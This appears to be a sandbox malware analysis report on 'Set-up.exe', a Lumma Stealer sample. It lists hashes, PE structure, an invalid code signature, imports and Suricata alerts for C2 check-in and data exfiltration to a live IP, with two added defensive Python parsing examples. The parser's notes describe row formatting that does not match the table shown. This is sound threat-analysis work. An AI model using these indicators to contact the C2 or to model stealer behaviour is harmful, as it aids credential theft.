a0e9f5d64349fb13191bc781f81f42e1 | 176.113.115.170.ps1 | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | Bootstrapper.exe | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | x.exe | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | SDIO_R773.exe | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | 176.113.115.170_3.ps1 | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | 4kN17cL4Tn.exe | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | 5tmmrpv3dn.exe | malicious | LummaC Stealer | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | b0cQukXPAl.exe | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | Q7QR4k52HL.exe | malicious | LummaC | 172.67.139.144
a0e9f5d64349fb13191bc781f81f42e1 | xNuh0DUJaG.exe | malicious | LummaC | 172.67.139.144
                                                                                    No context
                                                                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 4.912957308594877
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Set-up.exe
File size: 73'935'792 bytes
MD5: 7a7570c5afc5bf3d53854f4ae9e61457
SHA1: f58e3ef793b096e088438eb4df373294bf95c09b
SHA256: 3ab888d4b341b936543bb6d48504a4530c27466c4a40b0705ef3dba5a5326b6d
SHA512: 37c5605fca62df263ac8dd90628b4cf3ecd35a4c9b72556df98f3a92997ce90f317c00ad8606d7d7240064e92449263decef84257acc3312b07d1bbf539c5506
SSDEEP: 786432:r5jdQMlIFsGI9Op1nkhf9FXCcb5DWk30lpu+6ecJ5OozAJCChf6:r5jerBp1khf9FVpZSBFmzECe6
TLSH: 34F7011DA42240B5CAC705F20442EBEFDFAC91C7B30C69FB8558B829E65EEE13875275
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................,...7...............,...@...........................=.....O.h....... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x401490
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: (none set)
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC] (zero link timestamp: the build time was not recorded or was wiped)
TLS Callbacks: 0x577900, 0x5778b0, 0x586160
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 66f460940005bddd8c100e502fe04a61
Signature Valid: false
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the file's bytes do not match the digest the signature was computed over, so the content was modified after signing or the signature block was copied from another file; the certificate's standing is irrelevant to this failure)
Not Before / Not After: 29/09/2022 01:00:00 / 01/10/2023 00:59:59 (expired before this January 2025 analysis; the error above is a digest mismatch, not an expiry)
Subject Chain:
• CN="Chengdu Shengxuan Technology Co., Ltd.", O="Chengdu Shengxuan Technology Co., Ltd.", L=成都市 (Chengdu), S=四川省 (Sichuan), C=CN, SERIALNUMBER=91510100MA6ADXEC52, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=成都高新技术产业开发区 (Chengdu High-tech Industrial Development Zone), OID.1.3.6.1.4.1.311.60.2.1.2=四川省 (Sichuan), OID.1.3.6.1.4.1.311.60.2.1.3=CN
Version: 3
Thumbprint MD5: 182448CAE21BA54F268E2431834C010A
Thumbprint SHA-1: 95049E3871E56AD012E4A9FAF47E3ED3B24560ED
Thumbprint SHA-256: CB40734E877816F319B7003E8742ABF2E674853AE9E1E3F3DE48AAAF41CD9B6C
Serial: 093ED8E100C38F343753BB55EFF93AA9
                                                                                    Instruction
                                                                                    mov dword ptr [0077FB80h], 00000000h
                                                                                    jmp 00007F1BF4C5D6A6h
                                                                                    nop
                                                                                    sub esp, 1Ch
                                                                                    mov eax, dword ptr [esp+20h]
                                                                                    mov dword ptr [esp], eax
                                                                                    call 00007F1BF4DE0286h
                                                                                    test eax, eax
                                                                                    sete al
                                                                                    add esp, 1Ch
                                                                                    movzx eax, al
                                                                                    neg eax
                                                                                    ret
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 18h
                                                                                    mov eax, dword ptr [006CDF40h]
                                                                                    test eax, eax
                                                                                    je 00007F1BF4C5DA1Eh
                                                                                    mov dword ptr [esp], 006CE000h
                                                                                    call dword ptr [00781324h]
                                                                                    sub esp, 04h
                                                                                    test eax, eax
                                                                                    mov edx, 00000000h
                                                                                    je 00007F1BF4C5D9F8h
                                                                                    mov dword ptr [esp+04h], 006CE00Eh
                                                                                    mov dword ptr [esp], eax
                                                                                    call dword ptr [00781330h]
                                                                                    sub esp, 08h
                                                                                    mov edx, eax
                                                                                    test edx, edx
                                                                                    je 00007F1BF4C5D9EBh
                                                                                    mov dword ptr [esp], 006CDF40h
                                                                                    call edx
                                                                                    mov dword ptr [esp], 00401520h
                                                                                    call 00007F1BF4C5D96Eh
                                                                                    leave
                                                                                    ret
                                                                                    lea esi, dword ptr [esi+00000000h]
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    pop ebp
                                                                                    ret
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    mov edx, dword ptr [eax+04h]
                                                                                    test edx, edx
                                                                                    jne 00007F1BF4C5D9EDh
                                                                                    jmp 00007F1BF4C5D9F9h
                                                                                    lea esi, dword ptr [esi+00000000h]
                                                                                    mov edx, eax
                                                                                    mov eax, dword ptr [edx]
                                                                                    test eax, eax
                                                                                    jne 00007F1BF4C5D9DAh
                                                                                    mov eax, edx
                                                                                    ret
                                                                                    nop
                                                                                    lea esi, dword ptr [esi+00h]
                                                                                    mov edx, dword ptr [eax+08h]
                                                                                    test edx, edx
                                                                                    je 00007F1BF4C5D9FBh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x381000 | 0x1130 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3d8000 | 0xa90 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x467fbd0 | 0x2fe0 | (the Security entry is a raw file offset, not an RVA, so it maps to no section; 0x467fbd0 + 0x2fe0 equals the 73'935'792-byte file size, i.e. the certificate table is the last 12'256 bytes of the file)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x377c60 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3812d4 | 0x298 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2c946c | 0x2c9600 | 9cf47fc347cdbbf130eddec516aa1240 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x2cb000 | 0x2f44 | 0x3000 | 130b4e00ce634bad52c053e1574fe9a9 | False | 0.280517578125 | data | 3.243424224347642 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2ce000 | 0xb08f0 | 0xb0a00 | bea2499c0e1df9cd97a030da848314ac | False | 0.2471014132165605 | data | 6.065462763185077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x37f000 | 0x1720 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x381000 | 0x1130 | 0x1200 | 942388f17ddd7b3b9e942aa3e25ef1f0 | False | 0.3721788194444444 | data | 5.188836074181512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x383000 | 0x38 | 0x200 | d5aa9775f71d308d7c3bf602d41f42e9 | False | 0.080078125 | Matlab v4 mat-file (little endian) \220xW, numeric, rows 4198688, columns 0 | 0.32492027068200274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x384000 | 0x53e00 | 0x53e00 | f595e5ebf5bb869b2eb4cc0b46d0d7ff | False | 0.6724862611773472 | data | 7.476446820068237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3d8000 | 0xa90 | 0xc00 | ff44ed8a59e9a32256eeb1abc91aa665 | False | 0.3479817708333333 | data | 4.84698912941843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x3d80b8 | 0x230 | data | Ukrainian | Ukraine | 0.5035714285714286
RT_MANIFEST | 0x3d82e8 | 0x528 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4643939393939394
RT_MANIFEST | 0x3d8810 | 0x280 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.553125
DLL | Import
KERNEL32.dll | AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateFileMappingA, CreateFileW, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFileSize, GetFileSizeEx, GetHandleInformation, GetLastError, GetModuleHandleA, GetModuleHandleW, GetNamedPipeClientProcessId, GetProcAddress, GetProcessAffinityMask, GetStartupInfoA, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount64, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryFullProcessImageNameA, RaiseException, ReadFile, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
msvcrt.dll | __getmainargs, __initenv, __lconv_init, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _beginthreadex, _cexit, _endthreadex, _errno, _fileno, _get_osfhandle, _initterm, _iob, _isatty, _lock, _onexit, _setjmp3, _strdup, _strnicmp, _ultoa, _unlock, abort, atof, atoi, calloc, clearerr, exit, fclose, feof, ferror, fflush, fgetc, fopen, fprintf, fputc, fputs, fread, free, frexp, fwrite, getc, getenv, isalpha, isprint, isspace, iswctype, localeconv, malloc, mbstowcs, memchr, memcmp, memcpy, memmove, memset, gmtime, printf, putc, qsort, realloc, remove, setlocale, setvbuf, signal, strcat, strchr, strcmp, strcoll, strcpy, strerror, strftime, strlen, strncmp, strncpy, strrchr, strstr, strtol, strtoul, strxfrm, tolower, toupper, towlower, towupper, ungetc, vfprintf, time, wcscoll, wcsftime, wcslen, w csxfrm, longjmp, _write, _strdup, _setmode, _fileno, _fdopen
Language of compilation system | Country where language is spoken
Ukrainian | Ukraine
English | United States
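The following is an added example, not code from Joe Sandbox and not part of the sample: a stdlib-only Python triage that re-derives the static fields tabulated above for a PE32 image (zero link timestamp, TLS callbacks resolved through AddressOfCallBacks, the Security directory read as a file offset rather than an RVA, per-section entropy) and computes the Authenticode digest the way WinVerifyTrust does, which is the comparison that fails with TRUST_E_BAD_DIGEST when a signature block was computed over different bytes than the file now contains. It runs on a constructed PE produced by build_sample_pe(), not on Set-up.exe; the function names, the toy WIN_CERTIFICATE stub and the callback addresses are the example's own assumptions, and it handles PE32 only with sections assumed to lie in file order.

```python
"""PE32 triage plus Authenticode digest: an added, stdlib-only example (not Joe Sandbox
code) that runs on a constructed PE built below, not on Set-up.exe."""
import hashlib
import math
import struct

DIR_SECURITY, DIR_TLS = 4, 9   # IMAGE_DIRECTORY_ENTRY_* indices

def entropy(buf):
    """Shannon entropy in bits per byte: 8.0 is uniform, typical of packed or encrypted data."""
    n, counts = len(buf), [buf.count(bytes([v])) for v in range(256)]
    return -sum(c / n * math.log2(c / n) for c in counts if c) if n else 0.0

def rva_to_offset(sections, rva):
    s = next(s for s in sections if s["va"] <= rva < s["va"] + s["rsize"])  # StopIteration: unmapped
    return s["raw_ptr"] + rva - s["va"]

def triage_pe(data):
    """Parse a PE32 image from bytes and return what a static triage records."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("example handles PE32 (32-bit) only")
    entry, _, _, image_base = struct.unpack_from("<IIII", data, opt + 16)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize, "rsize": rsize,
                         "raw_ptr": raw_ptr, "flags": flags,
                         "entropy": round(entropy(data[raw_ptr:raw_ptr + rsize]), 2)})
    # TLS directory -> AddressOfCallBacks (a VA) -> NULL-terminated list of callback VAs.
    # Callbacks run before the entry point, so a debugger parked on EP never sees them.
    callbacks, (tls_rva, _) = [], dirs[DIR_TLS]
    if tls_rva:
        cb_va = struct.unpack_from("<I", data, rva_to_offset(sections, tls_rva) + 12)[0]
        off = rva_to_offset(sections, cb_va - image_base)
        while struct.unpack_from("<I", data, off)[0]:
            callbacks.append(struct.unpack_from("<I", data, off)[0])
            off += 4
    cert_off, cert_size = dirs[DIR_SECURITY]   # a raw file offset, not an RVA, hence no section
    return {"machine": machine, "timestamp": timestamp, "entrypoint_rva": entry,
            "entrypoint_section": next((s["name"] for s in sections
                                        if s["va"] <= entry < s["va"] + s["vsize"]), None),
            "tls_callbacks": callbacks, "sections": sections,
            "authenticode_blob": (cert_off, cert_size) if cert_off else None}

def indicators(info):
    hits = [] if info["timestamp"] else ["link timestamp 0 (1970-01-01): build time stripped"]
    if info["tls_callbacks"]:
        hits.append("%d TLS callback(s) execute before the entry point" % len(info["tls_callbacks"]))
    if info["authenticode_blob"]:
        hits.append("Authenticode table present: verify it, presence is not validity")
    hits += ["%s: entropy %.2f, likely packed or encrypted payload" % (s["name"], s["entropy"])
             for s in info["sections"] if s["entropy"] > 7.0]
    return hits

def authenticode_digest(data, algo="sha256"):
    """Hash the file as Authenticode does: skip the CheckSum field, the Security directory
    entry and the certificate table (assumes sections are in file order). When this differs
    from the digest inside the PKCS#7 blob, WinVerifyTrust fails with TRUST_E_BAD_DIGEST."""
    opt = struct.unpack_from("<I", data, 0x3C)[0] + 24
    checksum_off, secdir_off = opt + 64, opt + 96 + 8 * DIR_SECURITY
    cert_off, cert_size = struct.unpack_from("<II", data, secdir_off)
    h = hashlib.new(algo)
    h.update(data[:checksum_off])
    h.update(data[checksum_off + 4:secdir_off])
    tail = secdir_off + 8
    if cert_off:
        h.update(data[tail:cert_off])
        tail = cert_off + cert_size
    h.update(data[tail:])
    return h.hexdigest()

def build_sample_pe():
    """Constructed PE32 (hypothetical, not Set-up.exe) that shares the report's traits."""
    base = 0x400000
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)           # i386, 2 sections, timestamp 0
    opt = bytearray(0xE0)
    for off, fmt, val in ((0, "<H", 0x10B), (16, "<I", 0x1100), (28, "<I", base), (92, "<I", 16)):
        struct.pack_into(fmt, opt, off, val)   # magic, AddressOfEntryPoint, ImageBase, NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_TLS, 0x1000, 0x18)               # TLS dir at start of .text
    struct.pack_into("<II", opt, 96 + 8 * DIR_SECURITY, 0x600, 0x40)           # cert table (file offset)
    secs = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", b".data", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    text = bytearray(0x200)                                                    # TLS dir + callback table
    struct.pack_into("<IIIIII", text, 0, base + 0x1100, base + 0x1104, base + 0x1104, base + 0x1040, 0, 0)
    struct.pack_into("<III", text, 0x40, base + 0x1200, base + 0x1210, 0)      # two callbacks, NULL end
    data = bytes((i * 239 + 13) % 256 for i in range(0x200))                   # uniform bytes: entropy 8.0
    cert = struct.pack("<IHH", 0x40, 0x200, 2).ljust(0x40, b"\0")              # WIN_CERTIFICATE stub, no PKCS#7
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + secs).ljust(0x200, b"\0")
    return headers + bytes(text) + data + cert
```

Replacing the certificate table leaves authenticode_digest() unchanged while flipping a single byte inside a section changes it, which is exactly the asymmetry behind the report's "Digitally signed: true, Signature Valid: false" pair. On a real file, compare the value against the messageDigest carried in the PKCS#7 blob's SpcIndirectDataContent; indicators(triage_pe(open(path, "rb").read())) gives the flag list for any PE32 on disk.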
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-12T15:20:13.124090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:14.149231+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49732 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:14.149231+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:14.615838+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:15.116755+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49733 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:15.116755+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49733 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:15.818900+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:17.106777+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:17.580047+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49735 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:18.280695+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:21.757785+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:23.442162+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:26.618370+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:27.974091+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49745 | 172.67.139.144 | 443 | TCP
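The alert rows of this report survive text extraction with every column fused into one digit run, which is lossy: "192.168.2.449732172.67.139.144443" can be read as several different IP/port quadruples. The following parser is an added example written for this page (it is not Joe Sandbox or Suricata code): it recovers the rows as structured records, uses the addresses the report itself establishes (the sandbox host 192.168.2.4 and the two A records for rampnatleadk.click) to discard impossible readings, and refuses any row that stays ambiguous instead of guessing. The sample rows are the ones from the table above; KNOWN_IPS is the only input assumed from elsewhere in the report.

```python
"""Parse the fused Suricata alert rows of a Joe Sandbox text export (added example, not Joe Sandbox or Suricata code)."""
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass

# Column order as it survives extraction, with no delimiters between columns:
# <timestamp><sid><signature><severity><src_ip><src_port><dst_ip><dst_port><proto>
ROW_RE = re.compile(
    r"(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+[+-]\d{4})(?P<sid>\d{7})"
    r"(?P<sig>.*?)(?P<sev>\d)"              # lazy: the first digit that is followed by an IP
    r"(?P<blob>(?:\d{1,3}\.){3}\d[\d.]*?)"  # src ip + src port + dst ip + dst port, fused
    r"(?P<proto>[A-Z]+)"
)

@dataclass(frozen=True)
class Alert:
    ts: str
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str

def _octet_ok(s: str) -> bool:
    return s.isdigit() and (len(s) == 1 or s[0] != "0") and int(s) <= 255

def _port_ok(s: str) -> bool:
    return s.isdigit() and s[0] != "0" and int(s) <= 65535

def endpoint_readings(blob: str, known_ips: frozenset[str] = frozenset()) -> list[tuple[str, int, str, int]]:
    """Every (src_ip, src_port, dst_ip, dst_port) the fused digit run could encode.
    Splitting on '.' gives 7 tokens: a0 a1 a2 [a3+sport+b0] b1 b2 [b3+dport]; only the two
    bracketed tokens are ambiguous. A non-empty known_ips drops readings with unseen addresses."""
    parts = blob.split(".")
    if len(parts) != 7:
        return []
    a0, a1, a2, mid, b1, b2, tail = parts
    if not all(_octet_ok(x) for x in (a0, a1, a2, b1, b2)):
        return []
    readings: list[tuple[str, int, str, int]] = []
    for i in range(1, 4):                       # digits of the last source octet
        for j in range(1, 6):                   # digits of the source port
            a3, sport, b0 = mid[:i], mid[i:i + j], mid[i + j:]
            if not (_octet_ok(a3) and _port_ok(sport) and _octet_ok(b0)):
                continue
            for k in range(1, 4):               # digits of the last destination octet
                b3, dport = tail[:k], tail[k:]
                if not (_octet_ok(b3) and _port_ok(dport)):
                    continue
                src, dst = ".".join((a0, a1, a2, a3)), ".".join((b0, b1, b2, b3))
                if known_ips and not (src in known_ips and dst in known_ips):
                    continue
                readings.append((src, int(sport), dst, int(dport)))
    return readings

def parse_alert(row: str, known_ips: frozenset[str] = frozenset()) -> Alert | None:
    """One fused row -> Alert, or None if the row is malformed or still ambiguous."""
    m = ROW_RE.fullmatch(row.strip())
    if m is None:
        return None
    readings = endpoint_readings(m["blob"], known_ips)
    if len(readings) != 1:                      # lossy row: refuse to guess a flow
        return None
    src, sport, dst, dport = readings[0]
    return Alert(m["ts"], int(m["sid"]), m["sig"], int(m["sev"]), src, sport, dst, dport, m["proto"])

def summarize(rows: list[str], known_ips: frozenset[str]) -> dict:
    """Hits per SID, plus the C2 endpoints and client ports behind severity-1 alerts."""
    alerts = [a for a in (parse_alert(r, known_ips) for r in rows) if a is not None]
    high = [a for a in alerts if a.severity == 1]
    return {
        "parsed": len(alerts),
        "by_sid": dict(Counter(a.sid for a in alerts)),
        "c2_endpoints": sorted({(a.dst_ip, a.dst_port) for a in high}),
        "severity1_client_ports": sorted({a.src_port for a in high}),
    }

# Rows copied from the Suricata table of this report; KNOWN_IPS is the sandbox host plus
# the two A records the report shows for rampnatleadk.click (taken from its DNS answers).
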